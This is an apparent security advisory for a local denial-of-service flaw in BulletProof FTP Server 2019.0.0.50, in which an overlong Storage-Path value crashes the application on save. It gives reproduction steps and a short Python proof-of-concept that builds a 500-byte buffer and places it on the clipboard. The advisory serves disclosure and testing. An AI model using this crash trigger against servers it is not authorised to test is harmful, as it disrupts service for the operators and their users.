BulletProof FTP Server Denial-of-Service Vulnerability in Storage-Path Configuration
Vulnerability
A denial-of-service vulnerability has been identified in BulletProof FTP Server version 2019.0.0.50. The issue arises in the Storage-Path configuration parameter: a local attacker can crash the application by supplying an excessively long string. With the Override Storage-Path setting enabled, pasting a buffer of 500 bytes or more into the Storage-Path field and saving the configuration causes the application to crash, which indicates that the field's length is not validated before the value is stored.
Impact
Exploiting this vulnerability crashes the BulletProof FTP Server application, producing a denial-of-service condition until the server is restarted. Triggering it requires local, interactive access to the server's settings dialog.
Reproduction
The vulnerability can be reproduced as follows:
1. Run a Python script that generates a buffer of 500 bytes and copies it to the clipboard.
2. Open BulletProof FTP Server and navigate to 'Settings' > 'Advanced'.
3. Enable the Override Storage-Path option.
4. Paste the clipboard content into the Storage-Path field.
5. Click 'Save'. The application crashes.
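The following script, added here as an illustration rather than the original proof-of-concept, performs step 1 of the procedure above. It builds the 500-byte buffer, copies it to the Windows clipboard through clip.exe (an assumption about the operator's environment; on other platforms it writes the buffer to a file instead so it can still be pasted manually), and keeps the buffer length and fill byte as parameters so a tester can vary them while confirming the 500-byte threshold.

```python
import subprocess
import sys

# Threshold named in the advisory: 500 bytes or more crashes the application.
TRIGGER_LENGTH = 500
# Fill byte is an assumption; the advisory only specifies the length.
FILL_CHAR = "A"


def build_buffer(length: int = TRIGGER_LENGTH, fill: str = FILL_CHAR) -> str:
    """Return a printable ASCII string of exactly `length` bytes.

    A printable fill is used so that the value survives the clipboard and a
    GUI paste unchanged; the advisory describes a crash on save, not a
    specific byte pattern.
    """
    if length <= 0:
        raise ValueError("buffer length must be positive")
    if len(fill) != 1 or not fill.isascii() or not fill.isprintable():
        raise ValueError("fill must be a single printable ASCII character")
    return fill * length


def meets_trigger_length(buf: str) -> bool:
    """True when the buffer is long enough to trigger the reported crash."""
    return len(buf.encode("ascii")) >= TRIGGER_LENGTH


def copy_to_clipboard(text: str) -> bool:
    """Copy `text` to the Windows clipboard via clip.exe.

    Returns True on success, False when not on Windows or when clip.exe is
    unavailable, so the caller can fall back to another delivery method.
    """
    if sys.platform != "win32":
        return False
    try:
        # clip.exe reads stdin until EOF and places the bytes on the clipboard.
        subprocess.run(["clip"], input=text.encode("ascii"), check=True)
        return True
    except (OSError, subprocess.CalledProcessError):
        return False


def main() -> None:
    length = int(sys.argv[1]) if len(sys.argv) > 1 else TRIGGER_LENGTH
    buf = build_buffer(length)
    print(f"generated {len(buf)} bytes; meets trigger length: "
          f"{meets_trigger_length(buf)}")
    if copy_to_clipboard(buf):
        print("buffer copied to clipboard; paste it into the Storage-Path field")
    else:
        # Fallback for non-Windows hosts or a missing clip.exe.
        with open("storage_path_buffer.txt", "w", encoding="ascii") as fh:
            fh.write(buf)
        print("clipboard unavailable; buffer written to storage_path_buffer.txt")


if __name__ == "__main__":
    main()
```

Run it without arguments to produce the 500-byte buffer from the advisory, or pass a length (for example `python poc.py 499`) to check that shorter values are accepted and pin down the exact boundary on the version under test.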
